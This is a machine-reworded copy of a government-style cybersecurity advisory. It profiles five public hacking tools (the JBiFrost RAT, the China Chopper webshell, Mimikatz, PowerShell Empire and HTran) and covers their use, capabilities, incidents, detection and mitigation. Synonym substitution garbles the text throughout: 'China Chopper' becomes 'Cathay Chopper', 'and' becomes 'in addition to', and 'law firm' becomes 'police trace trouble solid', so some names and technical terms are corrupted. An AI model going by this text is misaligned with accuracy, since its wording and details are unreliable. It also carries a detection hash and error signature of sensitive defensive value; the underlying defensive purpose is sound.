Remote Access Trojan: JBiFrost
First observed inwards May 2015, the JBiFrost RAT is a variant of the Adwind RAT, with roots stretching dorsum to the Frutas RAT from 2012.
A RAT is a programme that, 1 time installed on a victim’s machine, allows remote administrative control. In a malicious context, it can—among many other functions—be used to install backdoors in addition to key loggers, bring covert shots, in addition to exfiltrate data.
Malicious RATs tin last hard to respect because they are commonly designed non to seem inwards lists of running programs in addition to tin mimic the behaviour of legitimate applications.
To foreclose forensic analysis, RATs direct hold been known to disable safety measures (e.g., Task Manager) in addition to network analysis tools (e.g., Wireshark) on the victim’s system.
In Use
JBiFrost RAT is typically employed yesteryear cyber criminals in addition to low-skilled threat actors, but its capabilities could easily last adapted for utilisation yesteryear state-sponsored threat actors.
Other RATs are widely used yesteryear Advanced Persistent Threat (APT) thespian groups, such every bit Adwind RAT, against the aerospace in addition to defense strength sector; or Quasar RAT, yesteryear APT10, against a broad arrive at of sectors.
Threat actors direct hold repeatedly compromised servers inwards our countries with the purpose of delivering malicious RATs to victims, either to gain remote access for farther exploitation, or to pocket valuable information such every bit banking credentials, intellectual property, or PII.
Capabilities
JBiFrost RAT is Java-based, cross-platform, in addition to multifunctional. It poses a threat to several unlike operating systems, including Windows, Linux, MAC OS X, in addition to Android.
JBiFrost RAT allows threat actors to pin in addition to displace laterally across a network or install additional malicious software. It is primarily delivered through emails every bit an attachment, usually an invoice notice, asking for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service.
Past infections direct hold exfiltrated intellectual property, banking credentials, in addition to personally identifiable information (PII). Machines infected with JBiFrost RAT tin also last used inwards botnets to send out distributed denial-of-service attacks.
Examples
Since early on 2018, nosotros direct hold observed an increment inwards JBiFrost RAT beingness used inwards targeted attacks against critical national infrastructure owners in addition to their render chain operators. There has also been an increment inwards the RAT’s hosting on infrastructure located inwards our countries.
In early on 2017, Adwind RAT was deployed via spoofed emails designed to aspect every bit if they originated from Society for Worldwide Interbank Financial Telecommunication, or SWIFT, network services.
Many other publicly available RATs, including variations of Gh0st RAT, direct hold also been observed inwards utilisation against a arrive at of victims worldwide.
Detection in addition to Protection
Some possible indications of a JBiFrost RAT infection tin include, but are non express to:
- Inability to restart the reckoner inwards prophylactic mode,
- Inability to opened upward the Windows Registry Editor or Task Manager,
- Significant increment inwards disk activity and/or network traffic,
- Connection attempts to known malicious Internet Protocol (IP) addresses, and
- Creation of novel files in addition to directories with obfuscated or random names.
Protection is best afforded yesteryear ensuring systems in addition to installed applications are all fully patched in addition to updated. The utilisation of a modern antivirus programme with automatic Definition updates in addition to regular scheme scans volition also aid ensure that most of the latest variants are stopped inwards their tracks. You should ensure that your scheme is able to collect antivirus detections centrally across its estate in addition to investigate RAT detections efficiently.
Strict application whitelisting is recommended to foreclose infections from occurring.
The initial infection machinery for RATs, including JBiFrost RAT, tin last via phishing emails. You tin aid foreclose JBiFrost RAT infections yesteryear stopping these phishing emails from reaching your users, helping users to position in addition to study phishing emails, in addition to implementing safety controls so that the malicious electronic mail does non compromise your device. The Great Britain National Cyber Security Centre (UK NCSC) has published phishing guidance.
Webshell: Cathay Chopper
China Chopper is a publicly available, well-documented webshell that has been inwards widespread utilisation since 2012.
Webshells are malicious scripts that are uploaded to a target host after an initial compromise in addition to grant a threat thespian remote administrative capability.
Once this access is established, webshells tin also last used to pin to additional hosts inside a network.
In Use
China Chopper is extensively used yesteryear threat actors to remotely access compromised spider web servers, where it provides file in addition to directory management, along with access to a virtual finally on the compromised device.
As Cathay Chopper is simply four KB inwards size in addition to has an easily modifiable payload, detection in addition to mitigation are hard for network defenders.
Capabilities
China Chopper has ii principal components: the Cathay Chopper client-side, which is run yesteryear the attacker, in addition to the Cathay Chopper server, which is installed on the victim spider web server but is also attacker-controlled.
The webshell customer tin number finally commands in addition to deal files on the victim server. Its MD5 hash is publicly available (originally posted on hxxp://www.maicaidao.com).
The MD5 hash of the spider web customer is shown inwards tabular array 1 below.
Table 1: Cathay Chopper webshell customer MD5 hash
| Webshell Client | MD5 Hash |
|---|---|
| caidao.exe | 5001ef50c7e869253a7c152a638eab8a |
The webshell server is uploaded inwards plainly text in addition to tin easily last changed yesteryear the attacker. This makes it harder to define a specific hash that tin position adversary activity. In summertime 2018, threat actors were observed targeting public-facing spider web servers that were vulnerable to CVE-2017-3066. The activity was related to a vulnerability inwards the spider web application evolution platform Adobe ColdFusion, which enabled remote code execution.
China Chopper was intended every bit the second-stage payload, delivered 1 time servers had been compromised, allowing the threat thespian remote access to the victim host. After successful exploitation of a vulnerability on the victim machine, the text-based Cathay Chopper is placed on the victim spider web server. Once uploaded, the webshell server tin last accessed yesteryear the threat thespian at whatsoever fourth dimension using the customer application. Once successfully connected, the threat thespian proceeds to manipulate files in addition to information on the spider web server.
China Chopper’s capabilities include uploading in addition to downloading files to in addition to from the victim using the file-retrieval tool wget to download files from the cyberspace to the target; in addition to editing, deleting, copying, renaming, in addition to fifty-fifty changing the timestamp, of existing files.
Detection in addition to protection
The most powerful defense strength against a webshell is to avoid the spider web server beingness compromised inwards the outset place. Ensure that all the software running on public-facing spider web servers is up-to-date with safety patches applied. Audit custom applications for mutual spider web vulnerabilities.[6]
One attribute of Cathay Chopper is that every activity generates a hypertext transfer protocol (HTTP) POST. This tin last noisy in addition to is easily spotted if investigated yesteryear a network defender.
While the Cathay Chopper webshell server upload is plainly text, commands issued yesteryear the customer are Base64 encoded, although this is easily decodable.
The adoption of Transport Layer Security (TLS) yesteryear spider web servers has resulted inwards spider web server traffic becoming encrypted, making detection of Cathay Chopper activity using network-based tools to a greater extent than challenging.
The most effective way to respect in addition to mitigate Cathay Chopper is on the host itself—specifically on public-facing spider web servers. There are uncomplicated ways to search for the presence of the web-shell using the command line on both Linux in addition to Windows based operating systems.[7]
To respect webshells to a greater extent than broadly, network defenders should focus on spotting either suspicious procedure execution on spider web servers (e.g., Hypertext Preprocessor [PHP] binaries spawning processes) in addition to out-of-pattern outbound network connections from spider web servers. Typically, spider web servers brand predictable connections to an internal network. Changes inwards those patterns may call for the presence of a spider web shell. You tin deal network permissions to foreclose web-server processes from writing to directories where PHP tin last executed, or from modifying existing files.
We also recommend that y'all utilisation spider web access logs every bit a source of monitoring, such every bit through traffic analytics. Unexpected pages or changes inwards traffic patterns tin last early on indicators.
Credential Stealer: Mimikatz
Developed inwards 2007, Mimikatz is mainly used yesteryear attackers to collect the credentials of other users, who are logged into a targeted Windows machine. It does this yesteryear accessing the credentials inwards retentivity inside a Windows procedure called Local Security Authority Subsystem Service (LSASS).
These credentials, either inwards plainly text, or inwards hashed form, tin last reused to give access to other machines on a network.
Although it was non originally intended every bit a hacking tool, inwards recent years Mimikatz has been used yesteryear multiple actors for malicious purposes. Its utilisation inwards compromises some the Blue Planet has prompted organizations globally to re-evaluate their network defenses.
Mimikatz is typically used yesteryear threat actors 1 time access has been gained to a host in addition to the threat thespian wishes to displace throughout the internal network. Its utilisation tin significantly undermine poorly configured network security.
In Use
Mimikatz source code is publicly available, which agency anyone tin compile their ain versions of the novel tool in addition to potentially develop novel Mimikatz custom plug-ins in addition to additional functionality.
Our cyber authorities direct hold observed widespread utilisation of Mimikatz alongside threat actors, including organized criminal offense in addition to state-sponsored groups.
Once a threat thespian has gained local administrator privileges on a host, Mimikatz provides the mightiness to obtain the hashes in addition to clear-text credentials of other users, enabling the threat thespian to escalate privileges inside a domain in addition to perform many other post-exploitation in addition to lateral displace tasks.
For this reason, Mimikatz has been bundled into other penetration testing in addition to exploitation suites, such every bit PowerShell Empire in addition to Metasploit.
Capabilities
Mimikatz is best known for its mightiness to call back clear text credentials in addition to hashes from memory, but its total suite of capabilities is extensive.
The tool tin obtain Local Area Network Manager in addition to NT LAN Manager hashes, certificates, in addition to long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). In addition, it tin perform pass-the-hash or pass-the-ticket tasks in addition to create Kerberos “golden tickets.”
Many features of Mimikatz tin last automated with scripts, such every bit PowerShell, allowing a threat thespian to chop-chop exploit in addition to traverse a compromised network. Furthermore, when operating inwards retentivity through the freely available “Invoke-Mimikatz” PowerShell script, Mimikatz activity is rattling hard to isolate in addition to identify.
Examples
Mimikatz has been used across multiple incidents yesteryear a broad arrive at of threat actors for several years. In 2011, it was used yesteryear unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust inwards DigiNotar led to the companionship filing for bankruptcy inside a calendar month of this compromise.
More recently, Mimikatz was used inwards conjunction with other malicious tools—in the NotPetya in addition to BadRabbit ransomware attacks inwards 2017 to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral displace in addition to enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.
In addition, a Microsoft interrogation squad identified utilisation of Mimikatz during a sophisticated cyberattack targeting several high-profile engineering in addition to fiscal organizations. In combination with several other tools in addition to exploited vulnerabilities, Mimikatz was used to dump in addition to probable reuse scheme hashes.
Detection in addition to Protection
Updating Windows volition aid cut the information available to a threat thespian from the Mimikatz tool, every bit Microsoft seeks to amend the protection offered inwards each novel Windows version.
To foreclose Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords inwards LSASS memory. This is default behaviour for Windows 8.1/Server 2012 R2 in addition to later, but tin last specified on older systems which direct hold the relevant safety patches installed.[8] Windows 10 in addition to Windows Server 2016 systems tin last protected yesteryear using newer safety features, such every bit Credential Guard.
Credential Guard volition last enabled yesteryear default if:
- The hardware meets Microsoft’s Windows Hardware Compatibility Program Specifications in addition to Policies for Windows Server 2016 in addition to Windows Server Semi-Annual Branch; and
- The server is non acting every bit a Domain Controller.
You should verify that your physical in addition to virtualized servers run across Microsoft’s minimum requirements for each release of Windows 10 in addition to Windows Server.
Password reuse across accounts, peculiarly administrator accounts, makes pass-the-hash attacks far simpler. You should laid user policies inside your scheme that discourage password reuse, fifty-fifty across mutual marker accounts on a network. The freely available Local Administrator Password Solution from Microsoft tin allow tardily administration of local administrator passwords, preventing the demand to laid in addition to shop passwords manually.
Network administrators should monitor in addition to response to odd or unauthorized trouble organisation human relationship creation or authentication to foreclose Kerberos ticket exploitation, or network persistence in addition to lateral movement. For Windows, tools such every bit Microsoft Advanced Threat Analytics in addition to Azure Advanced Threat Protection tin aid with this.
Network administrators should ensure that systems are patched in addition to up-to-date. Numerous Mimikatz features are mitigated or significantly restricted yesteryear the latest scheme versions in addition to updates. But no update is a perfect fix, every bit Mimikatz is continually evolving in addition to novel third-party modules are ofttimes developed.
Most up-to-date antivirus tools volition respect in addition to isolate non-customized Mimikatz utilisation in addition to should thus last used to respect these instances. But threat actors tin sometimes circumvent antivirus systems yesteryear running Mimikatz inwards memory, or yesteryear slightly modifying the master copy code of the tool. Wherever Mimikatz is detected, y'all should perform a rigorous investigation, every bit it almost for sure indicates a threat thespian is actively introduce inwards the network, rather than an automated procedure at work.
Several of Mimikatz’s features rely on exploitation of administrator accounts. Therefore, y'all should ensure that administrator accounts are issued on an as-required footing only. Where administrative access is required, y'all should apply privileged access administration principles.
Since Mimikatz tin only capture the accounts of those users logged into a compromised machine, privileged users (e.g., domain administrators) should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft.[9]
Network defenders should audit the utilisation of scripts, peculiarly PowerShell, in addition to inspect logs to position anomalies. This volition assist inwards identifying Mimikatz or pass-the-hash abuse, every bit good every bit inwards providing some mitigation against attempts to bypass detection software.
Lateral Movement Framework: PowerShell Empire
PowerShell Empire is an instance of a post-exploitation or lateral displace tool. It is designed to allow an aggressor (or penetration tester) to displace some a network after gaining initial access. Other examples of these tools include Cobalt Strike in addition to Metasploit. PowerShell Empire tin also last used to generate malicious documents in addition to executables for social engineering access to networks.
The PowerShell Empire framework was designed every bit a legitimate penetration testing tool inwards 2015. PowerShell Empire acts every bit a framework for continued exploitation 1 time a threat thespian has gained access to a system.
The tool provides a threat thespian with the mightiness to escalate privileges, harvest credentials, exfiltrate information, in addition to displace laterally across a network. These capabilities conk far a powerful exploitation tool. Because it is built on a mutual legitimate application (PowerShell) in addition to tin operate almost alone inwards memory, PowerShell Empire tin last hard to respect on a network using traditional antivirus tools.
In Use
PowerShell Empire has conk increasingly pop alongside hostile nation actors in addition to organized criminals. In recent years nosotros direct hold seen it used inwards cyber incidents globally across a broad arrive at of sectors.
Initial exploitation methods vary betwixt compromises, in addition to threat actors tin configure the PowerShell Empire uniquely for each scenario in addition to target. This, inwards combination with the broad arrive at of science in addition to intent inside the PowerShell Empire user community, agency that the ease of detection volition vary. Nonetheless, having a greater agreement in addition to awareness of this tool is a stair frontward inwards defending against its utilisation yesteryear threat actors.
Capabilities
PowerShell Empire enables a threat thespian to send out a arrive at of actions on a victim’s machine in addition to implements the mightiness to run PowerShell scripts without needing powershell.exe to last introduce on the scheme Its communications are encrypted in addition to its architecture is flexible.
PowerShell Empire uses “modules” to perform to a greater extent than specific malicious actions. These modules provide the threat thespian with a customizable arrive at of options to pursue their goals on the victim’s systems. These goals include escalation of privileges, credential harvesting, host enumeration, keylogging, in addition to the mightiness to displace laterally across a network.
PowerShell Empire’s ease of use, flexible configuration, in addition to mightiness to evade detection conk far a pop pick for threat actors of varying abilities.
Examples
During an incident inwards Feb 2018, a United Kingdom of Great Britain in addition to Northern Ireland liberate energy sector companionship was compromised yesteryear an unknown threat actor. This compromise was detected through PowerShell Empire beaconing activity using the tool’s default profile settings. Weak credentials on 1 of the victim’s administrator accounts are believed to direct hold provided the threat thespian with initial access to the network.
In early on 2018, an unknown threat thespian used Winter Olympics-themed socially engineered emails in addition to malicious attachments inwards a spear-phishing drive targeting several South Korean organizations. This laid on had an additional layer of sophistication, making utilisation of Invoke-PSImage, a stenographic tool that volition encode whatsoever PowerShell script into an image.
In Dec 2017, APT19 targeted a multinational police trace trouble solid with a phishing campaign. APT19 used obfuscated PowerShell macros embedded inside Microsoft Word documents generated yesteryear PowerShell Empire.
Our cybersecurity authorities are also aware of PowerShell Empire beingness used to target academia. In 1 reported instance, a threat thespian attempted to utilisation PowerShell Empire to gain persistence using a Windows Management Instrumentation lawsuit consumer. However, inwards this instance, the PowerShell Empire agent was unsuccessful inwards establishing network connections due to the HTTP connections beingness blocked yesteryear a local safety appliance.
Detection in addition to Protection
Identifying malicious PowerShell activity tin last hard due to the prevalence of legitimate PowerShell activity on hosts in addition to the increased utilisation of PowerShell inwards maintaining a corporate environment.
To position potentially malicious scripts, PowerShell activity should last comprehensively logged. This should include script block logging in addition to PowerShell transcripts.
Older versions of PowerShell should last removed from environments to ensure that they cannot last used to circumvent additional logging in addition to controls added inwards to a greater extent than recent versions of PowerShell. This page provides a skillful summary of PowerShell safety practices.[10]
The code integrity features inwards recent versions of Windows tin last used to boundary the functionality of PowerShell, preventing or hampering malicious PowerShell inwards the lawsuit of a successful intrusion.
A combination of script code signing, application whitelisting, in addition to constrained linguistic communication fashion volition foreclose or boundary the lawsuit of malicious PowerShell inwards the lawsuit of a successful intrusion. These controls volition also acquit upon legitimate PowerShell scripts in addition to it is strongly advised that they last thoroughly tested earlier deployment.
When organizations profile their PowerShell usage, they ofttimes disclose it is only used legitimately yesteryear a minor number of technical staff. Establishing the extent of this legitimate activity volition conk far easier to monitor in addition to investigate suspicious or unexpected PowerShell usage elsewhere on the network.
C2 Obfuscation in addition to Exfiltration: HUC Packet Transmitter
Attackers volition ofttimes desire to disguise their location when compromising a target. To do this, they may utilisation generic privacy tools (e.g., Tor) or to a greater extent than specific tools to obfuscate their location.
HUC Packet Transmitter (HTran) is a proxy tool used to intercept in addition to redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the cyberspace since at to the lowest degree 2009.
HTran facilitates TCP connections betwixt the victim in addition to a hop dot controlled yesteryear a threat actor. Malicious threat actors tin utilisation this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts inwards a network.
In Use
The utilisation of HTran has been regularly observed inwards compromises of both authorities in addition to manufacture targets.
A broad arrive at of threat actors direct hold been observed using HTran in addition to other connexion proxy tools to
- Evade intrusion in addition to detection systems on a network,
- Blend inwards with mutual traffic or leverage domain trust relationships to bypass safety controls,
- Obfuscate or enshroud C2 infrastructure or communications, and
- Create peer-to-peer or meshed C2 infrastructure to evade detection in addition to provide resilient connections to infrastructure.
Capabilities
HTran tin run inwards several modes, each of which forwards traffic across a network yesteryear bridging ii TCP sockets. They differ inwards damage of where the TCP sockets are initiated from, either locally or remotely. The 3 modes are
- Server (listen) – Both TCP sockets initiated remotely;
- Client (slave) – Both TCP sockets initiated locally; and
- Proxy (tran) – One TCP socket initiated remotely, the other initiated locally, upon receipt of traffic from the outset connection.
HTran tin inject itself into running processes in addition to install a rootkit to enshroud network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.
Examples
Recent investigations yesteryear our cybersecurity authorities direct hold identified the utilisation of HTran to hold in addition to obfuscate remote access to targeted environments.
In 1 incident, the threat thespian compromised externally-facing spider web servers running outdated in addition to vulnerable spider web applications. This access enabled the upload of webshells, which were so used to deploy other tools, including HTran.
HTran was installed into the ProgramData directory in addition to other deployed tools were used to reconfigure the server to bring Remote Desktop Protocol (RDP) communications.
The threat thespian issued a command to start HTran every bit a client, initiating a connexion to a server located on the cyberspace over port 80, which forwards RDP traffic from the local interface.
In this case, HTTP was chosen to blend inwards with other traffic that was expected to last seen originating from a spider web server to the internet. Other well-known ports used included:
- Port 53 – Domain Name System
- Port 443 – HTTP over TLS/Secure Sockets Layer
- Port 3306 – MySQL
- By using HTran inwards this way, the threat thespian was able to utilisation RDP for several months without beingness detected.
Detection in addition to Protection
Attackers demand access to a machine to install in addition to run HTran, so network defenders should apply safety patches in addition to utilisation skillful access command to foreclose attackers from installing malicious applications.
Network monitoring in addition to firewalls tin aid foreclose in addition to respect unauthorized connections from tools such every bit HTran.
In some of the samples analyzed, the rootkit factor of HTran only hides connexion details when the proxy fashion is used. When customer fashion is used, defenders tin sentiment details close the TCP connections beingness made.
HTran also includes a debugging status that is useful for network defenders. In the lawsuit that a finish becomes unavailable, HTran generates an mistake message using the next format:
sprint(buffer, “[SERVER]connection to %s:%d errorrn”, host, port2);
This mistake message is relayed to the connecting customer inwards the clear. Network defenders tin monitor for this mistake message to potentially respect HTran instances active inwards their environments.
